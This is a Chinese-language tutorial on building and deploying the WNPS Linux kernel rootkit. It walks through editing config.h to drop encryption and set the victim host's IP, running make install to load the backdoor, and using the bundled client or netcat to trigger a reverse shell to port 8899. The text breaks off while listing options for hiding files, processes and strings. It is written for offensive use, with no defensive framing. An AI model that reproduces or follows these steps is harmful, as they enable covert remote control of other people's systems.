WNPS编译及使用方法.docVIP

WNPS安装使用方法 WNPS是一个linux环境下工作的rootkit后门，使用相当简便。 首先，我们需要一个linux 2.6.x的linux内核，如果linux内核比2.6版本低，那么可以通过升级内核的方式得到linux 2.6.x的内核。Linux最新的内核可以在/下载。同时，获取的内核需要支持modules。 做好上述准备工作之后，就可以开始准备编译wnps-0.26-beta.tgz。 第一步当然是获取wnps的源码啦，可以到/tools/200710/1233.html下载获得。 下载wnps 下载源码之后，使用tar对wnps进行解压。 解压wnps 解压成功之后，在解压出来的目录下的内容 解压成功之后，需要对wnps进行一些修改。首先，进入wnps目录，使用vi编辑器修改config.h文件，达到修改wnps的目的。 如果想要使用windows平台的nc控制此后门，需要将config.h种的#define ENCRYPT修改为0，即通讯过程不进行加密。 修改config.h文件中的#define ENCRYPT 修改之后，保存，退出。 在修改服务端设置后，还需要修改客户端设置。 进入client目录，使用vi编辑器编辑config.h。同样，需要将#define ENCRYPT修改为0，且需要我们添加一行代码,如下: #define DEFAULT_IP 此句代码含义为设置远程肉鸡的ip地址，必须是客户端能够直接访问的ip地址。 修改client中的config.h文件 在修改好所有配置文件之后，就可以进行编译工作了。 我们先编译服务端，进入wnps目录，make 使用make编译服务端。 make之后，makeinstall，服务端就开始运行了。 运行服务端 在编译好服务端之后，需要开始编译客户端。 进入client目录，使用make命令进行编译。 使用make编译客户端 编译之后，可以看到client目录下出现了一些新的文件，其中client就是我们的客户端了。 在网上查看wnps客户端的运行命令，可知wnps客户端运行命令是 ./client optration 其operation包括tcp | packet 参数和listen参数。tcp | packet选项中victim ip 为远程服务器地址，必须填写这个参数。[victim port] 为远程服务器开放的端口，默认将会自动扫描常用开放的端口，在send.h里定义。[connect back ip] 为你要反弹回的主机地址，默认是本机公网ip地址，必须是可以让肉鸡能够回连的地址。[connect back port] 为你要反弹回的主机端口，默认为8899，在config.h里定义。 这里，我们假设服务端ip地址为5，客户端ip地址为4，端口等默认。 在本地输入./client –tcp 5 22之后，可以看到client通过send.h这个文件开始对服务端的端口进行扫描，当扫描到服务端开放的常用端口之后，获得一个wnps的远程shell。 获得远程shell。 除了使用wnps自带的client，我们还是可使用netcat来获得远程shell。 要想使用nc，同样需要下载nc的源码，然后对nc进行编译。nc的下载地址是：/distfiles/netcat-0.7.1.tar.bz2。 使用wget下载nc 下载之后，用tar工具解压。 使用tar工具对nc进行解压 然后对nc进行编译，依次运行./configure,make,make install如下图： 编译nc 在编译完成之后，进入/usr/local/bin/目录，ls一下，就可以看到nc的使用程序就在这里了。使用nc作为客户端的用法如下（仍然假设服务端ip为5）： ./nc –vv 5 22 执行此命令后，nc会获得远程主机5的22端口信息，并想此端口发送tcp数据包，激活shell，在本地8899端口获得shell，如下图： 此时，输入编译客户端时设置的密码，反弹IP及端口号，即可获得远程shell。如下图： 因为这个wnps只是一个测试版本，所以并不能获得实际性的执行权限，但原理就是这样了。 下面来介绍一下wnps的几个主要的文件： 服务端文件（wnps目录）中： Config.h 配置文件，其中： TCP_SHELL_KEY 表示要发送的主机密码，默认为@wztshellHIDE_FILE???? 表示我们将隐藏以HIDE_FILE字符为前缀的文件HIDE_TASK???? 表示我们将隐藏以HIDE_TASK字符为前缀的进程HIDE_STR?????? 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串HIDE_OPEN????